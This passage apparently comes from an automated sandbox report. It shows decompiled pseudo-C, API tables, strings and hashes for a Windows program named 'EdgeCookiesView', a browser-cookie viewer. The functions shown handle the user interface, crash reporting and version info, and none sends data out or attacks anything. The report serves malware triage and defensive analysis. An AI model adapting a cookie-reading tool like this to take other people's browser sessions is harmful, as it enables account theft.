					 *(_t187 + 0x27c) = 0 | E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0x00000000;
					E0040B147(_t187, E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0, 0);
					memcpy(_t187 + 0x744,  &(( *(_t187 + 0x698))[0x8a]), 0x200c);
					_t233 = _t232 + 0xc;
					E00401500(_t187 + 0x6c4, 0x72,  *(_t187 + 0x208));
					asm("sbb eax, eax");
					ShowWindow( *(_t187 + 0x6d4),  ~(( *(_t187 + 0x698))[0x89]) & 0x00000005);
					 *( *(_t187 + 0x698)) = 1;
					E004077CB( *((intOrPtr*)(_t187 + 0x69c)));
					_t241 =  *0x4134e0; // 0x0
					if(_t241 == 0) {
						E00405812(0x4134e0);
						if((GetFileAttributesW(0x4134e0) & 0x00000001) != 0) {
							GetTempPathW(0x104, 0x4134e0);
						}
					}
					_t225 = wcslen(0x4134e0);
					 *_t233 = L"report.html";
					_t105 = wcslen(??) + 1; // 0x1
					_t243 = _t225 + _t105 - 0x104;
					if(_t225 + _t105 >= 0x104) {
						 *((short*)(_t187 + 0x288)) = 0;
					} else {
						E00405930(_t187 + 0x288, 0x4134e0, L"report.html");
					}
					_t198 = 0x30;
					E00409BA7( *((intOrPtr*)(_t187 + 0x69c)), _t198);
					_t226 = _t187;
					E0040A6FF(_t226);
					E00405D0F( *(_t187 + 0x214), 0x2000000);
					_t200 = 1;
					 *((intOrPtr*)(_t187 + 0x6a0)) = RegisterWindowMessageW(L"commdlg_FindReplace");
					E0040A1DC(0, _t200, _t226, _t243);
					 *(_t229 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t229 + 0x64)) = 0x400;
					SendMessageW( *(_t226 + 0x214), 0x404, 2, _t229 + 0x60);
					SendMessageW( *(_t226 + 0x214), 0x40b, 0x1001, 0);
					return E00401BDC(_t226, 0x415);
				} else {
					_t228 = _t220 + 0xc;
					 *(_t229 + 0x74) = _t193;
					do {
						E00402842( *((intOrPtr*)(_t228 + 4)),  *((intOrPtr*)(_t228 - 8)),  *(_t229 + 0x70),  *((intOrPtr*)(_t228 - 0xc)),  *((intOrPtr*)(_t228 - 4)),  *_t228);
						_t232 = _t232 + 0x10;
						_t228 = _t228 + 0x14;
						_t81 = _t229 + 0x74;
						 *_t81 =  *(_t229 + 0x74) - 1;
					} while ( *_t81 != 0);
					goto L5;
				}
			}

0x0040a743
0x0040a747
0x0040a74d
0x0040a756
0x0040a75a
0x0040a75d
0x0040a760
0x0040a763
0x0040a766
0x0040a76c
0x0040a76d
0x0040a76e
0x0040a775
0x0040a77c
0x0040a780
0x0040a783
0x0040a786
0x0040a78e
0x0040a78f
0x0040a790
0x0040a797
0x0040a79e
0x0040a7a2
0x0040a7a5
0x0040a7a8
0x0040a7b0
0x0040a7b1
0x0040a7b2
0x0040a7b9
0x0040a7c0
0x0040a7c4
0x0040a7c7
0x0040a7ca
0x0040a7cf
0x0040a7d6
0x0040a7d7
0x0040a7d8
0x0040a7df
0x0040a7e6
0x0040a7ea
0x0040a7ed
0x0040a7f0
0x0040a7f8
0x0040a7f9
0x0040a7fa
0x0040a7fd
0x0040a804
0x0040a808
0x0040a80b
0x0040a80e
0x0040a816
0x0040a817
0x0040a818
0x0040a81f
0x0040a826
0x0040a82a
0x0040a82d
0x0040a830
0x0040a838
0x0040a83b
0x0040a83c
0x0040a83d
0x0040a842
0x0040a84f
0x0040a86a
0x0040a882
0x0040a888
0x0040a8c4
0x0040a8d0
0x0040a8d3
0x0040a8dd
0x0040a8e0
0x0040a8e9
0x0040a8fe
0x0040a900
0x0040a906
0x0040a90c
0x0040a911
0x0040a913
0x0040a913
0x0040a94f
0x0040a954
0x0040a95a
0x0040a962
0x0040a96e
0x0040a971
0x0040a99a
0x0040a9a6
0x0040a9ac
0x0040a9b4
0x0040a9d1
0x0040a9d9
0x0040a9ea
0x0040a9ff
0x0040aa05
0x0040aa22
0x0040aa27
0x0040aa39
0x0040aa4c
0x0040aa58
0x0040aa64
0x0040aa70
0x0040aa75
0x0040aa81
0x0040aa83
0x0040aa91
0x0040aa99
0x0040aa99
0x0040aa91
0x0040aaa5
0x0040aaa7
0x0040aab3
0x0040aab7
0x0040aabd
0x0040aad8
0x0040aabf
0x0040aacf
0x0040aad5
0x0040aae9
0x0040aaea
0x0040aaef
0x0040aaf1
0x0040ab01
0x0040ab07
0x0040ab13
0x0040ab1b
0x0040ab37
0x0040ab3e
0x0040ab45
0x0040ab58
0x0040ab6d
0x0040a973
0x0040a973
0x0040a976
0x0040a979
0x0040a98a
0x0040a98f
0x0040a992
0x0040a995
0x0040a995
0x0040a995
0x00000000
0x0040a979

APIs

Part of subcall function 00406AFA: LoadMenuW.USER32 ref: 00406B02

SetMenu.USER32(?,00000000), ref: 0040A84F
CreateStatusWindowW.COMCTL32(50000000,0040F454,?,00000101), ref: 0040A86A
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040A888

Part of subcall function 00405F82: GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
Part of subcall function 00405F82: LoadImageW.USER32 ref: 00405F9F
Part of subcall function 00405F82: GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
Part of subcall function 00405F82: CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 00405FD1
Part of subcall function 00405F82: GetSysColor.USER32(0000000F), ref: 00405FDC
Part of subcall function 00405F82: GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
Part of subcall function 00405F82: GetPixel.GDI32(00000000,?,?), ref: 0040600A
Part of subcall function 00405F82: SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 0040603B
Part of subcall function 00405F82: DeleteDC.GDI32(00000000), ref: 00406042

CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040A8B5
ImageList_Create.COMCTL32(00000010,00000010,00000018,00000000,00000001), ref: 0040A8CA

Part of subcall function 00402DE1: GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
Part of subcall function 00402DE1: LoadImageW.USER32 ref: 00402E01
Part of subcall function 00402DE1: GetObjectW.GDI32(?,00000018,?), ref: 00402E25
Part of subcall function 00402DE1: CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402E39
Part of subcall function 00402DE1: GetSysColor.USER32(0000000F), ref: 00402E45
Part of subcall function 00402DE1: GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
Part of subcall function 00402DE1: GetPixel.GDI32(00000000,?,?), ref: 00402E83
Part of subcall function 00402DE1: SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402F2F
Part of subcall function 00402DE1: DeleteDC.GDI32(00000000), ref: 00402F36

ImageList_Add.COMCTL32(?,00000000,00000000), ref: 0040A8E0
DeleteObject.GDI32(?), ref: 0040A8E9
SendMessageW.USER32(?,00000436,00000000,?), ref: 0040A8FE
GetModuleHandleW.KERNEL32(00000000), ref: 0040A919
CreateWindowExW.USER32 ref: 0040A940
GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 0040A9BA
LoadIconW.USER32(00000000,00000066), ref: 0040A9C3
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9D1
memcpy.MSVCRT ref: 0040AA22
ShowWindow.USER32(?,?), ref: 0040AA58
GetFileAttributesW.KERNEL32(004134E0), ref: 0040AA89
GetTempPathW.KERNEL32(00000104,004134E0), ref: 0040AA99
wcslen.MSVCRT ref: 0040AAA0
wcslen.MSVCRT ref: 0040AAAE
RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040AB0D
SendMessageW.USER32(?,00000404,00000002,?), ref: 0040AB45
SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040AB58

Strings

4A, xrefs: 0040AA7C
/nosaveload, xrefs: 0040A9E5
SysListView32, xrefs: 0040A93A
report.html, xrefs: 0040AAA7, 0040AABF
commdlg_FindReplace, xrefs: 0040AB08

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreatePixel$ImageMessage$HandleLoadModuleSelectSendWindow$DeleteList_$ColorCompatibleIconMenuwcslen$AttributesFilePathRegisterReplaceShowStatusTempToolbarmemcpy
String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$4A
API String ID: 945479791-4224175941
Opcode ID: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
Instruction ID: ef4bcdae66b01cb0e556df410aa057252edbff8cd3310fcf9c61045b6203d9f2
Opcode Fuzzy Hash: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
Instruction Fuzzy Hash: 35C1C271640344AFEB21DF64CC89FDA3BA5AF54304F04447AFE48AB2A2C7B59844CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004010C7, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004010C7(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x412f50;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x412f50);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"EdgeCookiesView");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00405B17(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x412fd0;
								if( *0x412fd0 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x412fd0;
									if( *0x412fd0 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x412fd0;
										if( *0x412fd0 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x412fd0);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00405CD2();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

0x004010c7
0x004010ca
0x004010cb
0x004010cf
0x004010d7
0x004010d9
0x004012a4
0x004012ac
0x004012e7
0x004012ae
0x004012c7
0x004012d6
0x004012d6
0x004012f5
0x0040130d
0x0040131e
0x00401320
0x0040132a
0x00000000
0x004010df
0x004010df
0x004010e0
0x00401265
0x0040126a
0x0040126d
0x00401271
0x0040127d
0x0040127d
0x00401280
0x00000000
0x00401286
0x0040128d
0x00401299
0x00000000
0x00401299
0x00401273
0x00401273
0x00401277
0x00000000
0x00000000
0x00000000
0x00000000
0x00401277
0x004010e6
0x004010e6
0x004010e9
0x00401215
0x00401217
0x0040121a
0x00401242
0x0040124a
0x00000000
0x00401250
0x00401258
0x0040125a
0x0040125d
0x00000000
0x00401263
0x00000000
0x00401263
0x0040125d
0x0040121c
0x0040121c
0x00401221
0x0040122f
0x00401237
0x00401237
0x004010ef
0x004010ef
0x004010f4
0x00401185
0x0040118e
0x0040119c
0x0040119f
0x004011a2
0x004011a4
0x004011a7
0x004011b4
0x004011b6
0x004011b9
0x004011d8
0x004011e0
0x00000000
0x004011e6
0x004011ee
0x004011f0
0x004011fb
0x004011fd
0x004011ff
0x00000000
0x00401205
0x00000000
0x00401205
0x004011ff
0x004011bb
0x004011bb
0x004011cd
0x00000000
0x004011cd
0x004010fa
0x004010fc
0x00401331
0x00401331
0x00401331
0x00401102
0x00401102
0x0040110b
0x00401119
0x0040111c
0x0040111f
0x00401121
0x00401124
0x00401136
0x00401151
0x00401159
0x00000000
0x0040115f
0x00401167
0x00401169
0x00401174
0x00401176
0x00401178
0x00000000
0x0040117e
0x0040117e
0x00000000
0x0040117e
0x00401178
0x00401138
0x0040113e
0x0040113f
0x0040113f
0x00401142
0x00401149
0x0040114b
0x0040114b
0x00401136
0x004010fc
0x004010f4
0x004010e9
0x004010e0
0x00401337

APIs

GetDlgItem.USER32 ref: 0040111F
ChildWindowFromPoint.USER32 ref: 00401131
GetDlgItem.USER32 ref: 00401167
ChildWindowFromPoint.USER32 ref: 00401174
GetDlgItem.USER32 ref: 004011A2
ChildWindowFromPoint.USER32 ref: 004011B4
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 004011BD
LoadCursorW.USER32(00000000,00000067), ref: 004011C6
SetCursor.USER32(00000000,?,?), ref: 004011CD
GetDlgItem.USER32 ref: 004011EE
ChildWindowFromPoint.USER32 ref: 004011FB
GetDlgItem.USER32 ref: 00401215
SetBkMode.GDI32(?,00000001), ref: 00401221
SetTextColor.GDI32(?,00C00000), ref: 0040122F
GetSysColorBrush.USER32(0000000F), ref: 00401237
GetDlgItem.USER32 ref: 00401258
EndDialog.USER32(?,?), ref: 0040128D
DeleteObject.GDI32(?), ref: 00401299
GetDlgItem.USER32 ref: 004012BE
ShowWindow.USER32(00000000), ref: 004012C7
GetDlgItem.USER32 ref: 004012D3
ShowWindow.USER32(00000000), ref: 004012D6
SetDlgItemTextW.USER32 ref: 004012E7
SetWindowTextW.USER32(?,EdgeCookiesView), ref: 004012F5
SetDlgItemTextW.USER32 ref: 0040130D
SetDlgItemTextW.USER32 ref: 0040131E

Strings

EdgeCookiesView, xrefs: 004012ED

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: EdgeCookiesView
API String ID: 829165378-2656830938
Opcode ID: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
Instruction ID: d9b36552e8d9c1158f8869abb926452dfc915059135fe28c0a7548d8f12e7aa6
Opcode Fuzzy Hash: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
Instruction Fuzzy Hash: 87515A31500308EBEB31AF60DD44AAE7BB5FB44301F104A3AF951B69F0C778AD59AB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C7, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040C0C7(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040E340(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00405B17(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x41245c,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00405D33( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x412450,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00405D33( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E0040591F();
					__eflags = _t64;
					if(_t64 == 0) {
						E0040C9D6();
					} else {
						E0040CA5A();
					}
					__eflags =  *0x41325c; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x412674; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x4128ec = 0;
						E0040CBD8(_t105, __eflags);
						__eflags =  *0x4128ec; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x4128f0, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x4128ec; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00405888( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x413260; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x412450);
							_push( *0x41245c);
							_push( *0x41244c);
							_push( *0x412434);
							_push( *0x412438);
							_push( *0x412440);
							_push( *0x412444);
							_push( *0x41243c);
							_push( *0x412448);
							_push( &_v1580);
							_push( *0x412674);
							_push( *0x412668);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040DFD6();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

0x0040c0cf
0x0040c0d7
0x0040c0df
0x0040c162
0x0040c176
0x0040c17d
0x0040c184
0x0040c19d
0x0040c19f
0x0040c1b2
0x0040c1b8
0x0040c1c6
0x0040c1cc
0x0040c1df
0x0040c1e6
0x0040c1f7
0x0040c1fe
0x0040c203
0x0040c206
0x0040c218
0x0040c225
0x0040c229
0x0040c22b
0x0040c22d
0x0040c23e
0x0040c244
0x0040c244
0x0040c25b
0x0040c25d
0x0040c25f
0x0040c26f
0x0040c275
0x0040c275
0x0040c276
0x0040c27b
0x0040c27d
0x0040c286
0x0040c27f
0x0040c27f
0x0040c27f
0x0040c28b
0x0040c291
0x0040c29b
0x0040c2a8
0x0040c2ae
0x0040c2b3
0x0040c2b9
0x0040c2bc
0x0040c2c2
0x0040c2c3
0x0040c2c4
0x0040c2ca
0x0040c2cf
0x0040c2d7
0x0040c2ea
0x0040c2ef
0x0040c2f2
0x0040c2f8
0x0040c30d
0x0040c313
0x0040c2f8
0x00000000
0x0040c293
0x0040c293
0x0040c299
0x0040c314
0x0040c31a
0x0040c321
0x0040c322
0x0040c32e
0x0040c334
0x0040c33a
0x0040c340
0x0040c346
0x0040c34c
0x0040c352
0x0040c358
0x0040c35e
0x0040c35f
0x0040c36b
0x0040c371
0x0040c376
0x0040c37b
0x0040c37c
0x0040c394
0x0040c3a5
0x0040c3ab
0x0040c3b1
0x0040c3b1
0x00000000
0x0040c299
0x0040c291
0x0040c0e2
0x0040c0e8
0x0040c0f3
0x0040c116
0x0040c124
0x0040c13f
0x0040c142
0x0040c14e
0x0040c156
0x0040c156
0x0040c116
0x0040c0f3
0x00000000

APIs

EndDialog.USER32(?,?), ref: 0040C10C
GetDlgItem.USER32 ref: 0040C124
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040C142
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 0040C14E
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0040C156
memset.MSVCRT ref: 0040C17D
memset.MSVCRT ref: 0040C19F
memset.MSVCRT ref: 0040C1B8
memset.MSVCRT ref: 0040C1CC
memset.MSVCRT ref: 0040C1E6
memset.MSVCRT ref: 0040C1FE
GetCurrentProcess.KERNEL32 ref: 0040C206
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040C229
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040C25B
memset.MSVCRT ref: 0040C2AE
GetCurrentProcessId.KERNEL32 ref: 0040C2BC
memcpy.MSVCRT ref: 0040C2EA
wcscpy.MSVCRT ref: 0040C30D
_snwprintf.MSVCRT ref: 0040C37C
SetDlgItemTextW.USER32 ref: 0040C394
GetDlgItem.USER32 ref: 0040C39E
SetFocus.USER32(00000000), ref: 0040C3A5

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040C371
{Unknown}, xrefs: 0040C191

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
Instruction ID: 3431b055b2365f4bc913e86f7a298cdc42a4156783f6a5b9feadd91d66c4c499
Opcode Fuzzy Hash: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
Instruction Fuzzy Hash: B271A3B2800119EEDB20AF51DD85EDA377CEB08354F0085BAF908F6191DA799E949F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE36, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040DE36(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E0040674D(__edi);
					_push(_v8);
					L0040E038();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x6cdfe853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900006c
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0xfee850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0x38680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040fa
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040DFD6();
						if(E0040DDA7( &_v572, _t84,  &_v60, 0x40f454) == 0) {
							goto L5;
						}
					}
					E0040DDA7(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040DDA7(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040DDA7(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040DDA7(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040DDA7(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040DDA7(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040DDA7(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040DDA7(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040E032();
				}
				return _t97;
			}

0x0040de36
0x0040de47
0x0040de49
0x0040de4c
0x0040de53
0x0040de56
0x0040de5f
0x0040de64
0x0040de67
0x0040de6d
0x0040de77
0x0040de91
0x0040de93
0x0040de96
0x0040de99
0x0040de9c
0x0040de9f
0x0040dea1
0x0040dea4
0x0040dea7
0x0040deaa
0x0040dead
0x0040deb0
0x0040deb3
0x0040deb6
0x0040deb6
0x0040dece
0x0040df08
0x0040df11
0x0040ded0
0x0040ded0
0x0040deda
0x0040dedb
0x0040dedc
0x0040dee4
0x0040dee6
0x0040dee7
0x0040df06
0x00000000
0x00000000
0x0040df06
0x0040df25
0x0040df3a
0x0040df4f
0x0040df64
